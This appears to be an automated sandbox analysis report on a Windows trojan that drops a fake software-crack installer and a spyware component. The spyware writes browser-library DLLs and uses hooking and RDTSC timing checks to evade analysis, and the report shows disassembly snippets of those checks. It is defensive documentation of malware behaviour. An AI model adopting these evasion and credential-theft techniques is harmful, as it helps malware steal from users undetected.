Source: C:\Users\user\Desktop\KbqArOlW06.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\KbqArOlW06.exe.log
Source: classification engine Classification label: mal60.troj.spyw.evad.winEXE@7/13@0/1
Source: C:\Users\user\Desktop\KbqArOlW06.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_0040A10C FindResourceA,SizeofResource,LoadResource,LockResource, 21_2_0040A10C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: KbqArOlW06.exe Virustotal: Detection: 26%
Source: KbqArOlW06.exe Metadefender: Detection: 28%
Source: KbqArOlW06.exe ReversingLabs: Detection: 69%
Source: C:\Users\user\Desktop\KbqArOlW06.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\KbqArOlW06.exe "C:\Users\user\Desktop\KbqArOlW06.exe"
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe "C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe"
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe "C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Process created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
Source: C:\Users\user\Desktop\KbqArOlW06.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_00409920 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 21_2_00409920
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00455E14 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, 22_2_00455E14
Source: C:\Users\user\Desktop\KbqArOlW06.exe File created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0045663C GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA, 22_2_0045663C
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp, 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: 2.0.0-beta2.cps.exe, 00000010.00000002.510199910.0000000061EB5000.00000002.00000001.01000000.0000000E.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: KbqArOlW06.exe Static file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
Source: C:\Users\user\Desktop\KbqArOlW06.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Mutant created: \Sessions\1\BaseNamedObjects\CCOYS///hdr
Source: A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe String found in binary or memory: need to be updated. /RESTARTAPPLICATIONS Instructs Setup to restart applications. /NORESTARTAPPLICATIONS Prevents Setup from restarting applications. /LOADINF="filename" Instructs Setup to load the settings from the specified file after having checked t
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Window found: window name: TSelectLanguageForm
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Automated click: OK
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Automated click: I accept the agreement
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Automated click: Next >
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: KbqArOlW06.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: KbqArOlW06.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: KbqArOlW06.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: KbqArOlW06.exe Static file information: File size 12978176 > 1048576
Source: KbqArOlW06.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0xc51c00
Source: KbqArOlW06.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: freebl3.pdb source: freebl3.dll.16.dr
Source: Binary string: mozglue.pdb@+ source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
Source: Binary string: nss3.pdb source: 2.0.0-beta2.cps.exe, 00000010.00000002.512735384.000000006D9EF000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: mozglue.pdb source: 2.0.0-beta2.cps.exe, 00000010.00000002.511072689.000000006D833000.00000002.00000001.01000000.0000000F.sdmp, mozglue.dll.16.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.16.dr
Source: Binary string: d:\agent\_work\2\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.16.dr

Data Obfuscation

Source: KbqArOlW06.exe, ???????????????????.cs .Net Code: Main System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Process created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp "C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp" /SL5="$303B2,111616,111616,C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe"
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_00406A50 push 00406A8Dh; ret 21_2_00406A85
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_004040B5 push eax; ret 21_2_004040F1
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_00404185 push 00404391h; ret 21_2_00404389
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_00404206 push 00404391h; ret 21_2_00404389
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_004042E8 push 00404391h; ret 21_2_00404389
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_00404283 push 00404391h; ret 21_2_00404389
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_004093EC push 0040941Fh; ret 21_2_00409417
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Code function: 21_2_004085B8 push ecx; mov dword ptr [esp], eax 21_2_004085BD
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00409DDC push 00409E19h; ret 22_2_00409E11
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0041A0B8 push ecx; mov dword ptr [esp], ecx 22_2_0041A0BD
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00452194 push ecx; mov dword ptr [esp], eax 22_2_00452199
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004062CC push ecx; mov dword ptr [esp], eax 22_2_004062CD
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0040A2DF push ds; ret 22_2_0040A2E0
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004605AC push ecx; mov dword ptr [esp], ecx 22_2_004605B0
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00458848 push 00458880h; ret 22_2_00458878
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00410970 push ecx; mov dword ptr [esp], edx 22_2_00410975
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00412DB8 push 00412E1Bh; ret 22_2_00412E13
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0040D2C8 push ecx; mov dword ptr [esp], edx 22_2_0040D2CA
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0040546D push eax; ret 22_2_004054A9
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0040553D push 00405749h; ret 22_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004055BE push 00405749h; ret 22_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0040563B push 00405749h; ret 22_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_004056A0 push 00405749h; ret 22_2_00405741
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0040F828 push ecx; mov dword ptr [esp], edx 22_2_0040F82A
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00443930 push ecx; mov dword ptr [esp], ecx 22_2_00443934
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00487AF0 push ecx; mov dword ptr [esp], ecx 22_2_00487AF5
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00459B60 push 00459BA4h; ret 22_2_00459B9C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00497B18 push ecx; mov dword ptr [esp], ecx 22_2_00497B1D
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00479C7C push ecx; mov dword ptr [esp], edx 22_2_00479C7D
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00451FD0 push 00452003h; ret 22_2_00451FFB
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00450A28 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 22_2_00450A28
Source: 2.0.0-beta2.cps.exe.0.dr Static PE information: section name: .2vB
Source: 2.0.0-beta2.cps.exe.0.dr Static PE information: section name: .a|D
Source: 2.0.0-beta2.cps.exe.0.dr Static PE information: section name: .=xC
Source: nss3.dll.16.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.16.dr Static PE information: section name: .didat
Source: mozglue.dll.16.dr Static PE information: section name: .00cfg
Source: freebl3.dll.16.dr Static PE information: section name: .00cfg
Source: softokn3.dll.16.dr Static PE information: section name: .00cfg
Source: sqlite3.dll.16.dr Static PE information: section name: /4
Source: sqlite3.dll.16.dr Static PE information: section name: /19
Source: sqlite3.dll.16.dr Static PE information: section name: /31
Source: sqlite3.dll.16.dr Static PE information: section name: /45
Source: sqlite3.dll.16.dr Static PE information: section name: /57
Source: sqlite3.dll.16.dr Static PE information: section name: /70
Source: sqlite3.dll.16.dr Static PE information: section name: /81
Source: sqlite3.dll.16.dr Static PE information: section name: /92
Source: initial sample Static PE information: section where entry point is pointing to: .=xC
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe File created: C:\Users\user\AppData\LocalLow\msvcp140.dll
Source: C:\Users\user\Desktop\KbqArOlW06.exe File created: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe File created: C:\Users\user\AppData\LocalLow\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe File created: C:\Users\user\AppData\LocalLow\mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe File created: C:\Users\user\AppData\LocalLow\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe File created: C:\Users\user\AppData\LocalLow\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe File created: C:\Users\user\AppData\LocalLow\sqlite3.dll
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe File created: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe File created: C:\Users\user\AppData\LocalLow\freebl3.dll
Source: C:\Users\user\Desktop\KbqArOlW06.exe File created: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp File created: C:\Users\user\AppData\Local\Temp\is-Q7MJ8.tmp\_isetup\_setup64.tmp

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Memory written: PID: 2332 base: 960005 value: E9 FB 99 A8 76
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Memory written: PID: 2332 base: 773E9A00 value: E9 0A 66 57 89
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Memory written: PID: 2332 base: 980007 value: E9 7B 4C AA 76
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Memory written: PID: 2332 base: 77424C80 value: E9 8E B3 55 89
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0042409C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus, 22_2_0042409C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00422CEC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow, 22_2_00422CEC
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0041815E IsIconic,SetWindowPos, 22_2_0041815E
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00418160 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement, 22_2_00418160
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0042466C IsIconic,SetActiveWindow,SetFocus, 22_2_0042466C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00424624 IsIconic,SetActiveWindow, 22_2_00424624
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00418814 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient, 22_2_00418814
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0042F75C IsIconic,GetWindowLongA,GetWindowLongA,GetActiveWindow,MessageBoxA,SetActiveWindow,GetActiveWindow,MessageBoxA,SetActiveWindow, 22_2_0042F75C
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00417A28 IsIconic,GetCapture, 22_2_00417A28
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_00485CFC IsIconic,GetWindowLongA,ShowWindow,ShowWindow, 22_2_00485CFC
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Code function: 22_2_0041F5A8 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary, 22_2_0041F5A8
Source: C:\Users\user\Desktop\KbqArOlW06.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\KbqArOlW06.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe System information queried: FirmwareTableInformation
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Special instruction interceptor: First address: 0000000000F3F96C instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe Special instruction interceptor: First address: 0000000000E151C1 instructions rdtsc caused by: RDTSC with Trap Flag (TF)
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000F057DF second address: 0000000000F057EA instructions: 0x00000000 rdtsc 0x00000002 mov ebp, 6C567DA2h 0x00000007 pop ebp 0x00000008 bswap esi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000F0772D second address: 0000000000E842F2 instructions: 0x00000000 rdtsc 0x00000002 test sp, 69E2h 0x00000007 cmp ebp, 35ED30BCh 0x0000000d cmc 0x0000000e sub esi, 00000008h 0x00000014 test si, bp 0x00000017 cmc 0x00000018 mov dword ptr [esi], edx 0x0000001a cmp edx, eax 0x0000001c mov dword ptr [esi+04h], eax 0x0000001f xor al, 65h 0x00000021 ror al, 00000008h 0x00000024 lea edi, dword ptr [edi-00000004h] 0x0000002a add ah, FFFFFFEFh 0x0000002d shld ax, dx, 000000ADh 0x00000032 movsx eax, sp 0x00000035 mov eax, dword ptr [edi] 0x00000037 cmc 0x00000038 test dx, si 0x0000003b xor eax, ebx 0x0000003d jmp 00007F3880CC7661h 0x00000042 not eax 0x00000044 jmp 00007F3880A70423h 0x00000049 inc eax 0x0000004a jmp 00007F3880BC463Ch 0x0000004f bswap eax 0x00000051 inc eax 0x00000052 stc 0x00000053 jmp 00007F3880E3AE9Bh 0x00000058 xor ebx, eax 0x0000005a cmc 0x0000005b add ebp, eax 0x0000005d jmp 00007F3880B9D1CAh 0x00000062 jmp 00007F3880C31C8Eh 0x00000067 lea ecx, dword ptr [esp+60h] 0x0000006b cmp esi, ecx 0x0000006d jmp 00007F3880B95358h 0x00000072 ja 00007F3880C6EB57h 0x00000078 jmp ebp 0x0000007a mov ecx, dword ptr [esi] 0x0000007c cmovnb edx, ebx 0x0000007f mov dh, 00000054h 0x00000082 rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000E13F38 second address: 0000000000E13F4C instructions: 0x00000000 rdtsc 0x00000002 mov edi, esp 0x00000004 rcr bp, 0056h 0x00000008 sar eax, cl 0x0000000a sub esp, 000000C0h 0x00000010 mov ebx, esi 0x00000012 ror al, cl 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000E5AB1B second address: 0000000000E5AB29 instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 cmp sp, sp 0x00000006 mov ebx, ebx 0x00000008 adc dx, 4935h 0x0000000d popfd 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000E096EF second address: 0000000000E842F2 instructions: 0x00000000 rdtsc 0x00000002 cmc 0x00000003 sub esi, 00000008h 0x00000009 test dh, FFFFFFAFh 0x0000000c clc 0x0000000d mov dword ptr [esi], edx 0x0000000f mov dword ptr [esi+04h], eax 0x00000012 sub edi, 00000004h 0x00000018 btr ax, 004Ch 0x0000001d xor al, 6Eh 0x0000001f mov eax, dword ptr [edi] 0x00000021 test si, 0EC0h 0x00000026 cmc 0x00000027 xor eax, ebx 0x00000029 jmp 00007F3880C2CC7Ah 0x0000002e not eax 0x00000030 inc eax 0x00000031 jmp 00007F3880E883C8h 0x00000036 bswap eax 0x00000038 jmp 00007F3880A38857h 0x0000003d inc eax 0x0000003e cmp si, dx 0x00000041 jmp 00007F3880C1770Ch 0x00000046 xor ebx, eax 0x00000048 cmp edi, 54DC680Dh 0x0000004e jmp 00007F3880C7E24Eh 0x00000053 add ebp, eax 0x00000055 jmp 00007F3880B46358h 0x0000005a jmp 00007F3880D471C3h 0x0000005f lea ecx, dword ptr [esp+60h] 0x00000063 cmp esi, ecx 0x00000065 jmp 00007F3880B951F8h 0x0000006a ja 00007F3880C6E9F7h 0x00000070 jmp ebp 0x00000072 mov ecx, dword ptr [esi] 0x00000074 cmovnb edx, ebx 0x00000077 mov dh, 00000054h 0x0000007a rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000A9EC46 second address: 0000000000A9EC5A instructions: 0x00000000 rdtsc 0x00000002 mov edi, esp 0x00000004 rcr bp, 0056h 0x00000008 sar eax, cl 0x0000000a sub esp, 000000C0h 0x00000010 mov ebx, esi 0x00000012 ror al, cl 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe RDTSC instruction interceptor: First address: 0000000000B4EE51 second address: 0000000000B4EE5F instructions: 0x00000000 rdtsc 0x00000002 pop ebp 0x00000003 cmp sp, sp 0x00000006 mov ebx, ebx 0x00000008 adc dx, 4935h 0x0000000d popfd 0x0000000e rdtsc
